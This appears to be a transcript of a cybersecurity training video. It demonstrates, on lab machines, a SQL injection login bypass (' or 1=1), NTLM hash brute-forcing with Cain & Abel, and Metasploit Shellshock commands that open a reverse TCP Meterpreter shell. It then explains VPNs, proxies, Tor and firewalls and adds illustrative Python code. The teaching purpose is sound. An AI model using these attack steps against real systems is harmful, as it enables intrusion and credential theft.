some confidential information, knowingly or unknowingly, by tricking them with fake mails or fake websites or malicious emails that you have sent to them, which they have failed to recognize as malicious, and they click on it, thus getting victimized. Social engineering attacks are always successful because of the gullibility of humans: empathy, sympathy; humans basically have emotions, and emotions can be toyed with and then taken advantage of if the person is not careful enough. For example, the most common social engineering attack that we see is the Nigerian fraud, where we receive an email that someone somewhere has died and has left a huge estate behind, a few hundred million, and we have been identified as the person through whom they want to transfer the money to a foreign land to save on taxes. What are the chances of that happening on a daily basis, right? How many princes are there? So that’s something that we do not verify; it’s just, I guess, the greed, if you will, of striking it rich quickly that makes us believe these kinds of emails. We have also received emails about lottery tickets that we have won over a period of time without even having bought a lottery ticket. So if you haven’t bought one, what did you win? But we don’t ask these questions; we just get excited about the amount of money that we have won, and then we try to bet on our luck and try to see if that email is going to fructify or if it’s just another scam. So social engineering attacks are a dime a dozen these days, and we need to be very careful about what we trust on the internet.

Let’s look at the penetration testing tools. There are hundreds and thousands of tools out there; most of these have been consolidated and collected together and hosted on an operating system known as Kali Linux, which we have talked about earlier. Now, the predecessor to Kali Linux was BackTrack. BackTrack is no longer continued; it has been discontinued, and Kali Linux has taken the place of BackTrack, within which are all the tools that you
see on your screen. Metasploit is one of the most favorite penetration testing tools of hackers and ethical hackers; there are a lot of inbuilt exploits over there, and we’ll be doing a demo at the end of the session on this. Nmap is the information gathering tool which will scan for live devices, and scan for open ports, protocols and services. BeEF would be an application testing tool that would help us find exploits within applications. The Nessus vulnerability scanner is a network- and host-based scanner that would help you identify vulnerabilities within such hosts. Wireshark is a network sniffer which allows you to capture network packets and analyze them to see if there is any information worth capturing within those packets. sqlmap is an automated tool used for SQL injection attacks, so you don’t even have to craft your queries for SQL injection; it will be done by the sqlmap tool. You just need to identify whatever is possible through the queries that sqlmap is going to create, and then, based on the activity that you’ve identified, you just need to redefine your search parameters to get access to the database. We’ll be doing a demo on sqlmap as well. And then there is John the Ripper. John the Ripper is a tool that is used for password cracking, so dictionary attacks and brute force attacks are done using John the Ripper. What is a dictionary attack? A dictionary attack is an attack where we create a list of all probable passwords, store them in a txt file, and run that list against the password tool to see if any of those passwords are going to match. A brute force attack is trying the same attack but with every permutation and combination of the alphabet that we have, and we’re going to try to figure out if we are able to crack the password at all. So these are just some of the tools; for every tool there are another 100 supporting tools or more than that. Like for the Nessus vulnerability scanner you’ll have the Qualys vulnerability scanner, you have GFI LanGuard, and there are lots of other software out there, but these are some of the most commonly utilized tools.

Let’s look at the Metasploit attack. Metasploit is a framework for penetration testing that makes hacking very simple. You just need to know how to utilize the tool; you need to identify the vulnerability associated with a particular exploit and then run the exploit on Metasploit. We’ll be demoing this during the practical. So there are active exploits and passive exploits. An active exploit exploits a specific computer, runs until execution and then exits; it uses brute force and exits when an error occurs. In a passive exploit, these exploits wait for incoming requests and exploit them as soon as they connect; they can also be used in conjunction with emails and web browsers. So in passive exploits we create a payload, like a reverse connection payload, and we send it to the victim. Once the victim installs that software, the machine will then initiate a connection to us; our machine will be in a listen mode, and once that software is executed at their end we would then try to connect and exploit that particular vulnerability. This is the practical that we’ll be doing on Metasploit. So let’s move on with the demos, and then we’ll see what we can discuss amongst them.

All right, let’s have a look at some of the demos that we had talked about in the ethical hacking and penetration testing module. We are going to look at three different demos. The first one is going to be a SQL injection attack that we’re going to perform on this tool that we have; the second one is a password cracking attack on Windows 7; and the third one is a Meterpreter-based, or Metasploit-based, Shellshock attack on a Linux-based web server. So let’s get cracking. I’ve powered on this virtual machine, which is the OWASP Broken Web Application. It is a tool that is provided for people who want to enhance their skills, and they can practice how to do these attacks in a legal manner. So we
are going to go to this site. I'm just going to open up my browser; the IP address is 71.132, and that's the OWASP Broken Web Application that we want to utilize. We're going to head off to Mutillidae 2, and we are going to look at a SQL injection attack where we want to bypass authentication. Now this takes us to the login screen, so we can just try our luck here and see that the authentication mechanism works: "account does not exist". So the username and password that we have supplied is not the correct one. So we want to ensure that there's a SQL database, and we can try to attack it and see if we can bypass the authentication. Now what we want to do is create a SQL-based malformed query that can give us a different output. So I'm just going to type in a single quote over here and click login, and you can see that this is now suddenly recognized as an operator and there's an error that is given out. Compared to the login that we tried earlier, when we used a proper text-based login mechanism, it gave us "account does not exist", but here the single quote gave us an error, and it shows us how SQL works: this is the query that we had created. Now in the trainings that you have for ethical hacking there would be explanations of what these queries are all about and how the syntax works; here we're just going to see if we can create a malformed query to log in as a user. In this case, what I'm going to do is create the query over here, and we're going to give it a comparison: we're going to give it a single quote, "or 1=1", followed by a space. If you now click login you should be able to bypass authentication, and you can see "user has been authenticated"; we now have admin access to this application. Now here the SQL queries need to be crafted in such a way that they're going to work, so there would be a lot of exercise in identifying what the database is (there's a Microsoft database, an Oracle database and so on and so forth), and then you have to choose the proper commands, but identifying that would come in the training. Right now we're just looking at a demo; this is how a SQL injection attack works.

Now let me log out here. Similarly, now we are in a login page where the same query worked wonders and allowed us to bypass authentication, so it also depends on what kind of page I am on and what query would be accepted at this point in time. So here application understanding would also come into the picture: which function we are calling upon when we are connected to a particular page. Now this is a user lookup function, right? So again here we try the same method, "test": that's not going to work, "authentication error, bad user or password". And if we type in the same query over here, single quote, "or", and give it a condition, "' or 1=1" followed by a space, now here it is not going to log us in, because this is not a login page, this is a user lookup form; so here it would instead give us a dump of all the data that it has. So you can see all the usernames and passwords coming in that are stored in the user lookup field. So this is where the understanding comes in of which query to create on what page, depending upon the function that is being called. Right, so that's the SQL injection attack that we wanted to look at.

Let's move on to password cracking. Now this is a Windows 7 machine that we have. I'm just going to do a very basic password cracking example. We're just going to log in. Now here the assumption is that we are able to log in, we have access to a computer, and we want to check out other users who are using this computer and see if we can find out their passwords, so that we can log in as a different user, steal data if required, and we wouldn't be to blame if there are any logs that are created. So here we've got a tool called Cain & Abel that is installed right here. Now I'm already an administrator on this machine; I'm checking out other administrators who share the same privileges, or any other user who may be on this system, whose password I
can crack, and thus I would be able to get access through their account and then do any malicious activity. Right, so this allows me to go into a cracker tool, and it allows me to enumerate this machine and identify all the users and passwords that are there on this particular machine. So I'm just going to click on the plus sign and I'm going to import hashes from the local system. So where are these files stored, where does Windows store its passwords, in what format are they stored, and what does this tool do to retrieve those? That's something that we all need to know as an ethical hacker, right? So import the hashes from the local system, click on next, it's going to enumerate that file and it is going to give you a list of all the users that are there. So you can see the users: hacker, admin, test (the one that we are logged in as), and then there's a user called virus as well, and you can see that this is the hash value of the password that is being utilized. Now there's a particular format for a hash value for Windows and how it stores it, but once we have these hash values, let's say if I want to crack this password, there are various attacks that we can do, for example a dictionary-based attack or a brute force attack. Let's try a brute force attack. Right, NTLM is the hashing mechanism that is used by Windows, so we're going to try to create an NTLM hash attack, and here we're going to use a predetermined rule set. For example, we are not sure what characters are being utilized over here, so we just create an attack like this using all characters: lowercase a through z, uppercase A through Z, numeric 0 through 9 and all the special characters. Let's say the password is between 7 and 16 characters, and this is the character set that we want to try the brute force attack on. What is a brute force attack? It is an attack where the computer is going to try each and every permutation and combination out of this character set and try to figure out if the password is going to be correct. So if we click start, it's going to start with particular characters, and then it is going to identify if that NTLM hash is going to work against this character, and you can see the time is going to be phenomenal over here. So it's not necessary that this attack would be viable; it will be 100% successful given the time frame, however the time frame is huge enough for this attack to become a little bit redundant. There are other attacks that we can do which can easily identify this data for us as well, but that is something that we will look at in future videos. So that's how we can get access to users and passwords.

There are different mechanisms where, let's say, we don't have login access; then what are we going to do, how can we create a fake user login, or how can we remotely access a machine and then try to get the same access? That is what we are going to try to do in the next demo on a Linux machine, and what we are doing on a Linux machine could also be doable on the Windows machine with a different exploit. So what I'm going to do is: this is the Linux web server that I have, which I'm going to power on. I'm going to use a Kali Linux machine to hack that device, and I'm going to just power off my Windows 7 machine. Give it a minute till it boots up. Now this is also a demo machine that we have which has its own preconfigured vulnerabilities; so here we've got something from PentesterLab, and it has a Shellshock vulnerability implemented inside. The Shellshock vulnerability affects Linux, Mac and Unix-based operating systems for a particular version of the bash shell. Bash is the Bourne Again Shell, which is the command line interface in these operating systems. So what we are trying to do here is use the Kali Linux machine, try to find out the vulnerability over here, and if it exists, we are going to use Metasploit to attack this machine. Now the first and foremost thing is we want to identify the IP address; we have no idea what the IP address is. We are in the same
subnet, so we are assuming that we're able to connect to this machine. So what I'm going to do is open up a tool called Zenmap. I'm going to open up a command line interface, find out what my IP address is, and my IP address is this, with a subnet mask of 255.255.255.0. So I want to see if there are any other machines that are live in the same subnet, and we are doing a ping sweep over here to identify which machines are live. In a minute we'll get all the IP addresses: 71.1, .2, .133, .254 and .128. We know that we are .128 at this point in time; .254 is the DHCP server, so we are assuming that .133 is the machine that we want to look at. Let's then try to see if we can scan that machine, .133, and we're going to do an intense scan to find out which ports are open, what services are running over there, and whether it is the pentest machine that we were looking for. You can see at the start port 22 and port 80, and somewhere here it's going to give us the ports that are open and the details about those ports, and somewhere here it will tell us that this is the PentesterLab machine that we wanted, which is correct. So now we want to do a vulnerability analysis on this. What we are going to do is use another GUI-based tool called Sparta, which I can just find from here. Sparta uses two tools in the background: the Nmap tool and a tool called Nikto. So we're just going to start scanning 192.168.71.133, which was the IP address; add to scope, and over a period of time you can see all of these will start populating with information. There we are, that's the Nikto tool coming in, scanning on port 80, which means that it's a web server using HTTP. It tells us it's an Apache httpd 2.2.21 and gives us port 22 as well. If we head over to the tab of Nikto, or let's look at the screenshot first: this is what the website would be looking like, and Nikto gives us the options over here. It tells us that there is a vulnerability over here for Shellshock, and this is the path where the vulnerability is going to exist.

So what we're going to do is go back to the command line, sorry, we open up a new one, minimize all these other windows, and we're going to open up Metasploit. Metasploit is a penetration testing tool that is used by most hackers and ethical hackers to test applications and test existing exploits and vulnerabilities. So just give it a minute till it starts. You can see there are already around 1,700 exploits right here. We're going to see all those exploits with these commands (there we are, sorry for the typo), and it will just give us a list of all the exploits that are stored in Metasploit in this version. So all of these are Windows-based; if we scroll up we will be looking at other vulnerabilities, or exploits, as well: the Unix exploits, Linux, OS X, multi exploits. And we're looking for an exploit for multi-based Apache or HTTP. Let's go up, let's look at... So this is the one that we're looking for: apache_mod_cgi_bash_env_exec. So what we're going to do is just copy it, go back to the bottom, say "use exploit" and paste the one that we wanted, press enter, say "show options", and it'll ask us to configure this. I'm just going to configure it based on the knowledge that we have: set RHOST, which is the remote host, the victim's machine, so we put in the IP address. It asks us for the target URI, so that's the path that we saw: set TARGETURI to /cgi-bin/status, enter. Now with the exploit we need to find a payload that is going to give us the output that we want, so we say "show payloads" and it will give us a list of all the compatible payloads for this exploit, and we want to create a reverse TCP connection, which is this. So we know it's a Linux operating system; we want this payload to be set, so "set payload", press enter, that's the payload coming in. "show options": now that we have set the payload, these are the options for the exploit, and now we want to set our options for the payload as well. So we are creating a reverse TCP connection, which means we are remotely executing code at the victim side and making the victim connect back to our machine, which means we need to set up a listener. So I need to put my IP address over here: set local host, or LHOST, 192.168.71.128, which was our IP address. "show options" again just to ensure everything is fine, which looks like it is, and we then type in the word "exploit" so that it will start this attack. I can see that it has created a Meterpreter session at the victim site and it has opened up a session. So if I do a pwd now (pwd is a Linux command for present working directory), it will show us that we're connected to the www/cgi-bin directory; do an ls and it will list all the files, that's the status file over there; do a cd / and it will take us to the root of this machine.

If you're someone who is interested in building a career in cyber security by graduating from the best universities, or a professional who seeks to switch careers to cyber security by learning from the experts, then try giving a shot to Simplilearn's post-graduate program in cyber security with modules from the MIT Schwarzman College of Engineering; the course link is mentioned in the description box, which will navigate you to the course page where you can find a complete overview of the program being offered.

Jude is waiting at the airport to hop on her flight back home when she realizes that she missed making an important bank payment. She connects her laptop to the public Wi-Fi at the airport and goes ahead to carry out the bank transaction. Everything goes well and Jude completes her transaction. After a couple of days she was wiped off her feet when she learned that her bank account was subjected to a cyber attack and a hefty amount was wiped from her account. After getting in touch with the bank authority she learned that her account was hacked at the airport. She then realized that the public Wi-Fi she used might have caused her this trouble. Jude wishes that had her bank
transfer escaped the hacker's eyes, she would not have been a victim of a cyber attack. Bank officials advise her to use a VPN for future transactions, especially when connecting to an open or public network. Like most of us, Jude had come across the term VPN several times but didn't know much about it, and little did she think that the repercussions of not using a VPN would be this bad. Let's understand how the hacker would have exploited Jude's transaction in the absence of a VPN. In this process, Jude's computer first connects to the internet service provider (ISP), which provides access to the internet. She sends her details to the bank's server using her IP address. An internet protocol address, or IP address, is a unique address that recognizes a particular device, be it a laptop or smartphone, on the internet. When these details pass through the public network, the hacker who passively watches the network traffic intercepts them. This is a passive cyber attack where the hacker collects Jude's bank details without being detected. More often than not, in such an attack payment information is likely to be stolen; the targeted data here are the victim's username, passwords and other personal information. Such an unsecured connection exposed Jude's IP address and bank details to the hacker when they passed through the public network.

So would Jude have been able to secure her transaction with the help of a VPN? Well, yes. Picture Jude's bank transaction to be happening in a tunnel that is invisible to the hacker; in such a case the hacker will not be able to spot her transaction, and that is precisely what a VPN does. A virtual private network, more often known as a VPN, creates a secure tunnel between your device and the internet. For using a VPN, Jude's first step would be to install software-based technology known as the VPN client on her laptop or smartphone that would let her establish a secure connection. The VPN client connects to the Wi-Fi and then to the ISP. Here the VPN client encrypts Jude's information using VPN protocols; data is encrypted to make sure it is secure. Next, the VPN client establishes a VPN tunnel within the public network that connects to the VPN server. The VPN tunnel protects Jude's information from being intercepted by the hacker. Jude's IP address and actual location are changed at the VPN server to enable a private and secure connection. Finally, in the last step, the VPN server connects to Jude's bank server, where the encrypted message is decrypted. This way Jude's original IP address is hidden by the VPN, and the VPN tunnel protects her data from being hacked. This explains how a VPN makes your data anonymous and secure when it passes through the public network, and the difference between a normal connection and a VPN connection. After learning about this, Jude was certain that she should start using a VPN to carry out her online transactions in the future. This is also applicable to each one of us: even if you work remotely or connect to public Wi-Fi, using a VPN is the safest option. In
addition to providing a secure, encrypted data transfer, VPNs are also used to disguise your whereabouts and give you access to regional web content. VPN servers act as proxies on the internet; this way your actual location cannot be established. A VPN enables you to spoof your location and switch to a server in another country, and thereby change your location. For example, by doing so you can watch any content on Netflix that might be unavailable for your region.

Meet Jonathan. He is an investigative journalist who occasionally researches and publishes news articles contrary to the government's ideologies. On one such occasion he could not access a global news website dealing with uncensored information; it seemed his IP was blocked from visiting the news website. With his IP blocked, Jonathan turned to a popular proxy service that was able to unblock the news website, thereby allowing an open internet to all users. Just like how your friend gives proxy attendance for you, a proxy server serves as a stand-in user to keep the real client private. But what is a proxy? Let's understand its working by taking a look at how Jonathan was able to access geo-blocked content without much hassle. A proxy server acts as a gateway or intermediary server between a user and their destination website. When Jonathan wasn't able to access the news website, he connected his system to a global proxy server. Once connected, the proxy server assigns a new IP address to Jonathan's system, an IP address of a different country where the website is not censored. Following this process, whenever Jonathan visits that website, the website administrators see the new IP address assigned via the proxy server and see no reason to deny access to their account. Once the proxy server is able to access the website, it's passed on to Jonathan's system via the same channel. Regarding accessibility to proxy servers, you must first set one up on your computer, device or network. Next, check the steps required for your computer or network, as each operating system has its own setup procedures; in most cases, however, setup entails using an automated configuration script. There are plenty of free proxy services available on the internet; however, the safety of such proxies is rarely verified. Most free proxies will provide an IP address and a relevant port for connection purposes. Reputed proxy providers like Smartproxy and Bright Data that run on subscription models will most likely provide credentials to log in with when establishing the connection. This extra step acts as authentication that verifies an existing subscription on the proxy provider's server, unlike free providers that are open to all.

When it comes to hiding IP addresses, many people consider a VPN to be the primary solution. While that's true up to some extent, there are a few things proxies do differently. In the case of VPNs, extra encryption is also carried out to create a secure tunnel between the user's device and a VPN server. A VPN is usually much faster, more secure thanks to multiple layers of encryption, and has little to no downtime. Proxies tend to be comparatively unsafe, with the service owners having the exact IP address of the end user and having no guarantees regarding downtimes and reliability. If you want to know more about how VPNs work, do watch how Jude could have protected her banking credentials using VPNs in our detailed video linked above. Now let's take a small quiz to check how much we have learned. What can a VPN connection provide that a proxy service cannot? (a) a new IP address, (b) multiple layers of encryption, (c) access to geo-blocked content, (d) authentication credentials. Think about it and leave your answers below in the comments section; three lucky winners will receive Amazon gift vouchers. What about the benefits of a proxy service, though? Besides allowing access to blocked content, proxies can serve as an efficient firewall system. They can also filter content from third-party websites, allowing control over internet usage. In many cases browsing speeds are stabilized compared to vanilla internet thanks to proper optimization of the base proxy server. The element of privacy proxies provide is highly lucrative to people looking to hide their actual IP address from as many prying eyes as possible. One can easily argue the benefits of using VPNs over proxies for added security measures; however, a few basic tasks don't warrant maximum privacy on the user's side as in other cases. For example, many consumers worldwide find proxy services more convenient, since all major operating systems, from Windows to Android, allow proxy configuration without the hassle of installing new applications, as is the case with a VPN. In addition, there are services online that function as web proxies, allowing users to access blocked content without any setup from their end: they can enter the target URL and the web proxy will route data from its physical server. This level of freedom is hard to come by in the case of VPNs, making proxies an ideal solution for casual browsing.

With the next generation of internet exchanges focused on maximum privacy and security, a variety of ways have been enforced to maintain them. As such, censorship has shifted from the streets to the digital domain; it forces the standard citizen to derive alternative ways to maintain anonymity. A major weapon in this battle for privacy and security is the Tor browser, an independent browser meant to browse the internet while relaying information through the Tor network. It serves as a meaningful alternative to standard internet browsing habits. To better understand the purpose of this browser, you must learn about the working of the Tor network. Featuring its own routing protocol, the Tor browser is an easy way to maintain anonymity while browsing without emptying one's wallet. Let's take a look at the topics to be covered today. We start with the explanation of what the Tor network is and its significance in the working of the Tor browser. We take a look at the onion
routing protocol and how it transmits the data from the client devices to the to directories in order to circumvent government censorship moving on we learn a few features of the to browser and the distinct advantages the to network provides next we learn the difference between using a VPN and a tour to anonymize internet usage and finally we have a live demonstration of the to browser anonymization features in action let’s move on to learning about the to network to short for the onion router it’s an open-source privacy network that permits users to browse the web anonymously the to was initially developed and solely used by the US Navy to protect sensitive government communications before the network was made publicly available the digital era has disrupted the traditional way of doing things in every sector of the economy the rapid rise in development and innovation of digital products has given way to frequent data breaches and cyber thefts in response consumers are increasingly opting for products that offer data privacy and cyber security to is one such underground network that was implemented for the purpose of protecting users identities the to network is one example of the many emerging technologies that attempt to fill a data privacy void in a digital space plagued by cyber security concerns the to network intercepts the traffic from your browser and bounces a user’s request of a random number of other user IP addresses then the data is passed to the user requested final destination these random users are volunteer devices which are called as nodes or relays the to network disguises your identity by encrypting the traffic and moving it across different to relays within the network the to network uses an onion routing technique for transmitting data hence the original name of onion router to operate within the to network a user has to install the to browser any address or information requested using the browser is transmitted through the to network it has 
its own feature set which we will be going over later in this video as we discussed already the data passing through the to network must follow a unique protocol known as the onion routing protocol let us learn more about its unique characteristics in our normal network usage the data is transmitted directly the sender has data packets to transmit which is done directly over a line of communication with either a receiving party or a server of some kind however since the data can easily be captured while being transmitted the security of this exchange is not very reliable moreover it becomes very easy to trace the origin of such requests on many occasions websites with questionable and controversial content are blocked from the ISP this is possible since the ISP is able to detect and spy on user information passing through the network apart from ISPs there is a steady chance of your private information being intercepted by hackers unfortunately easy detection of the source and contents of a web request make entire network extremely vulnerable for people who seek anonymity over the internet however in the onion routing protocol things take a longer route we have a sender with the top browser installed on the client system the network sends the information to node 1’s IP address which encrypts the information and passes it on to node 2’s address which performs another encryption and passes it on to node 3 address this is the last address which is also known as the exit node this last node decrypts the encrypted data and finally relays the request to the final destination which can be another device or a server end this final address thinks the request came from the exit node and grants access to it the encryption process across multiple computers repeats itself from the exit node to the original user the to network obiscates user IP addresses from unwanted surveillance by keeping the user’s request untraceable with multiple servers touching the data it makes the 
tracking very difficult for both ISPs and malicious attackers now that we understand the way to works let us learn more about the to browser the to browser was developed by a nonprofit organization as a part of the to project in 2008 and its first public release was announced the to browser is a browser fork from the popular Firefox that anonymizes your web traffic using the to network if you’re investigating a competitor researching an opposing litigant in a legal dispute or just think it’s creepy for your ISP or the government to know what websites you visit the top browser might be the right solution before the top browser were developed using that network to maintain anonymity was a huge task for everyday consumers starting from the setup to the usage the entire process demanded a lot of knowledge and practice the to browser managed to make it easy for users to traverse the relay servers in to guarantee the privacy of the data exchange a major feature of the to browser is the ability to delete all browser history cookies and tracking data the moment it is closed every new launch of the browser opens an empty slate having your usage habits from being tracked and singled out a major feature that is the highlight of the to network is the availability of onion links only a small portion of the worldwide web is available to the general public we have the deep web that contains links that are not allowed to be indexed by standard search engines like Google and Bing the dark web is a further subset of the deep web which contains onion links to browser gives you access to these onion websites which are only available within the to network onion is a special use tople domain which designates an anonymous onion service which is also known as a hidden service similar to the links of the deep web these onion links provide services like online shopping cryptocurrency and many other products not available in the consumer internet space often being considered as a haven for 
illegal activities and sales. Onion links provide both information and assets in a private manner without the risk of spying by authorities. Browsing the web over Tor is slower than the clear net due to the multiple layers of encryption, and some web services also block Tor users. The Tor browser is also illegal in authoritarian regimes that want to prevent citizens from reading, publishing, and communicating anonymously. Journalists and dissidents around the world have embraced Tor as a cornerstone of democracy, and researchers are hard at work improving Tor's anonymity properties.

Let us take a look at some of the advantages of using the Tor browser over standard web browsers. The highlight of using the Tor browser is maintaining anonymity over the internet. The reason for wanting this differs from person to person, but all of these concerns are addressed by the Tor network: routing the information via multiple nodes and relay servers makes it very difficult for the ISP to keep track of usage data. The entire Tor project is designed to be completely free and open source; allowing the browser's code to be inspected and audited by third parties helps in the early detection of faulty configurations and critical bugs. It is available for multiple operating systems, from laptops to mobile devices. A number of websites are blocked by governments for a variety of reasons, and journalists under authoritarian regimes have difficulty getting the word out about the situation; since the onion routing protocol transfers data between multiple servers in random countries, the blocked domains become available when used via Tor. Use of encrypted messaging platforms is also easily achieved through the Tor browser, which would otherwise be a difficult task under oppressive circumstances.

Many people believe that a VPN offers the same benefits as the Tor browser. Let's put both of them to the test and see the differences between them. Coming to the first point of difference, Tor is completely free and open source: all of the code for the browser and the network can be audited and has been cleared of security concerns. When it comes to VPNs, there are many different brands; some have open-source clients, but the same cannot be said for their server side. Some are partly open source, while others have completely locked up their code so that it cannot be stolen. Moving on, Tor has multiple relay points in its data transfer protocol between the sender and the receiver: there are three different IP nodes (that number can increase, but it will always be more than two), and once the data leaves the sender it goes through all of those relay points. In the case of a VPN, the connection is made from the client device to the VPN server and then to the requested destination; there is no other IP node involved, making the connection one-to-one between the client and the VPN. As a next point, since Tor handles multiple layers of encryption and the data passes through multiple systems along the way, its performance is slow compared to a VPN, where performance is relatively fast due to the smaller number of nodes the data passes through. Similarly, the multi-layer encryption of Tor is consistent: if you use the Tor browser, every single request passes through the same layers of encryption and follows the same routing protocol. In the case of a VPN, different companies offer different levels of encryption; some have multi-hop, some prefer a single one-to-one connection, and these kinds of differences make the choice much more variable. Finally, the nodes and relays used in the Tor network are run by volunteers, with no company in control of them, so jurisdiction becomes relatively straightforward; whereas many VPNs are hosted by adware companies or are monitored by central governments that note the usage information.

Now that we have a better understanding of the Tor browser and its routing, let us take a look at how the Tor browser can
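route a request so that no single hop sees both the sender and the destination.

To make the layered encryption concrete, here is an added example (not part of the original course material and not the Tor project's code): a three-relay onion is built in Python, each relay strips exactly one layer, and the simulation records what each relay could see. The cipher is a toy SHA-256 counter-mode keystream, the relay names and keys are constructed, and no network is involved; real Tor uses AES with keys negotiated per hop.

```python
"""Toy onion routing: three relays, three layers, each relay peels one layer.
Added example; the cipher and the relay keys are constructed for illustration."""
import hashlib
import json
import os


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    # SHA-256 in counter mode as a stand-in stream cipher (toy, not Tor's AES).
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def encrypt(key: bytes, data: bytes) -> bytes:
    nonce = os.urandom(16)  # fresh nonce per layer so identical payloads differ
    return nonce + bytes(a ^ b for a, b in zip(data, _keystream(key, nonce, len(data))))


def decrypt(key: bytes, blob: bytes) -> bytes:
    nonce, body = blob[:16], blob[16:]
    return bytes(a ^ b for a, b in zip(body, _keystream(key, nonce, len(body))))


def build_onion(relays, destination: str, request: str) -> bytes:
    """relays: list of (name, key) in path order (guard, middle, exit).
    The innermost layer, readable only by the exit, names the real destination."""
    layer = encrypt(relays[-1][1], json.dumps({"next": destination, "payload": request}).encode())
    for i in range(len(relays) - 2, -1, -1):
        # Each outer layer tells relay i only where to forward the inner blob.
        wrapped = {"next": relays[i + 1][0], "payload": layer.hex()}
        layer = encrypt(relays[i][1], json.dumps(wrapped).encode())
    return layer


def layer_readable(key: bytes, blob: bytes) -> bool:
    """True only if `key` opens the OUTERMOST layer of blob."""
    try:
        json.loads(decrypt(key, blob))
        return True
    except ValueError:  # garbage bytes: wrong key for this layer
        return False


def send_through_circuit(relays, destination: str, request: str):
    """Simulate the circuit; returns the request the exit forwards and what each relay saw."""
    blob = build_onion(relays, destination, request)
    observations = []
    delivered = None
    for i, (name, key) in enumerate(relays):
        inner = json.loads(decrypt(key, blob))
        observations.append({"relay": name, "sees_next": inner["next"]})
        if i < len(relays) - 1:
            blob = bytes.fromhex(inner["payload"])  # still encrypted for the remaining hops
        else:
            delivered = inner["payload"]  # only the exit relay sees the plaintext request
    return delivered, observations


# Constructed circuit: names and keys are placeholders, not real Tor relays.
CIRCUIT = [("guard", b"g" * 32), ("middle", b"m" * 32), ("exit", b"x" * 32)]

if __name__ == "__main__":
    result, seen = send_through_circuit(CIRCUIT, "example.org:443", "GET / HTTP/1.1")
    for entry in seen:
        print(entry["relay"], "forwards to", entry["sees_next"])
    print("exit delivers:", result)
```

Peeling the outer layer with the exit relay's key fails, which is the property the lecture describes: the guard learns only the next relay, and only the exit learns the destination. Now let us take a look at how the Tor browser itself can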
anonymize and protect our internet usage. On opening the Tor browser for the first time, this is the page you are welcomed with. You have the option of connecting to the Tor network before we start browsing, so let's press Connect, and we can see that it is connected.

Coming to the anonymization, let's check my current location on Google Chrome: it is currently showing as Navi Mumbai in Maharashtra. If we check the same link in the Tor browser, we should get a different address. Every link we open in the Tor browser will be a little delayed and the speed will be hampered because of the multiple layers of encryption, as we discussed. As you can see, it is now showing a German IP in the state of Bavaria. This is how the anonymization works: there is no VPN configured and no proxy attached; it is straight up the out-of-the-box settings that come built into the Tor browser. Similarly, we have an option of cleaning up the data. Let's say you want to refresh your location and use a different identity for the next browsing session: just restart it once, check again, and we should see a different country this time. As you can see, we have the Netherlands right now. This is how you can keep refreshing your address and your host location so that you cannot be tracked while browsing the internet.

As we discussed, there are onion links that can only be used on the Tor network. As you can see, these kinds of links do not open in the Google Chrome browser, but once we copy them over to the Tor browser we have opened the Hidden Wiki, which is available only on the Tor network. This is a kind of alternative Wikipedia where we can find articles to read and more information to learn. Similarly, we have another onion link over here which is, once again, available only in the Tor browser. These kinds of delays are expected, but they are a valid compromise because they maintain the anonymity that many people desire. Similarly, we have found a hidden wallet, which is a cryptocurrency wallet specifically for dark web members. This operates over the Tor network and is used mostly by journalists and people who want to anonymize their internet transactions. When it comes to dealing with money, all of the transactions that occur over the Tor network are almost impossible to track, and therefore these kinds of cryptocurrency wallets are very big on the deep web. This is just one example; there are multiple different wallets for every single cryptocurrency available.

Imagine our houses without a fence or boundary wall. This would make our property easily accessible to trespassers and robbers and place our homes at great risk, right? Hence fencing our property helps safeguard it and keeps trespassers at bay. Similarly, imagine our computers and networks without protection; this would increase the probability of hackers infiltrating our networks. To overcome this challenge, just as boundary walls protect our houses, a virtual wall helps safeguard and secure our devices from intruders, and such a wall is known as a firewall. Firewalls are security devices that filter the incoming and outgoing traffic of a private network. For example, if you were to visit a friend who lives in a gated community, you would first take permission from the security guard. The security guard would check with your friend whether you should be allowed entry; if all is well, your access is granted. On the other hand, the security guard would not grant permission to a trespasser looking to enter the same premises. Here, entry access depends solely on the discretion of your friend, the resident. The role of the security guard in this case is similar to that of a firewall: the firewall works like a gatekeeper at your computer's entry point, which only welcomes incoming traffic that it has been configured to accept.

Firewalls filter the network traffic within your network and analyze which traffic should be allowed or restricted based on a set of rules, in order to spot and prevent cyber attacks. Your computer communicates with the internet in the form of network packets that hold details like the source address, the destination address, and the information being carried. These network packets enter your computer through ports. The firewall works on a set of rules based on the details of these network packets, like their source address, destination address, content, and port numbers; only trusted traffic sources or IP addresses are allowed to enter your network. When you connect your computer to the internet, there is a high chance of hackers infiltrating your network. This is when a firewall comes to your rescue by acting as a barrier between your computer and the internet: the firewall rejects the malicious data packet and thus protects your network from hackers, while traffic from trusted websites is allowed access to your network. This way the firewall carries out quick assessments to detect malware and other suspicious activity, thereby protecting your network from being susceptible to a cyber attack.

Firewalls can be either hardware or software. Software firewalls are programs installed on each computer; this is also called a host firewall. Hardware firewalls, meanwhile, are equipment set up between the gateway and your network links; routers are a good example of a hardware firewall. Besides this, there are other types of firewalls designed according to their traffic filtering methods, structure, and functionality. The firewall that compares each outgoing and incoming network packet to a set of established rules, such as the allowed IP addresses, IP protocols, port numbers, and other aspects of the packet, is known as a packet filtering firewall; if the incoming network traffic does not match the permitted rules, that traffic is blocked. A variant of the packet filtering firewall is the stateful inspection firewall. These types of firewalls not only examine each network packet but also check whether or not
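that packet belongs to a connection the firewall has already recorded in its state table.

As an added example (not code from the original course), here is a small Python model of both firewall types: a stateless packet filter that judges every packet against its rules alone, and a stateful variant that keeps a table of connections it has allowed and admits the replies to them without a separate inbound rule. The addresses, ports, and rule sets are constructed for the demonstration; the `run_scenario` function compares how the two handle a legitimate HTTPS reply and an unsolicited inbound packet that merely claims to come from port 443.

```python
"""Stateless packet filtering vs stateful inspection (added example)."""
from dataclasses import dataclass
from typing import Union


@dataclass(frozen=True)
class Packet:
    src_ip: str
    dst_ip: str
    proto: str
    src_port: int
    dst_port: int
    syn: bool = False  # TCP SYN without ACK: first packet of a new connection
    ack: bool = False


@dataclass(frozen=True)
class Rule:
    action: str  # "allow" or "deny"
    src_ip: str = "*"
    dst_ip: str = "*"
    proto: str = "*"
    src_port: Union[int, str] = "*"
    dst_port: Union[int, str] = "*"

    def matches(self, p: Packet) -> bool:
        checks = (
            (self.src_ip, p.src_ip), (self.dst_ip, p.dst_ip), (self.proto, p.proto),
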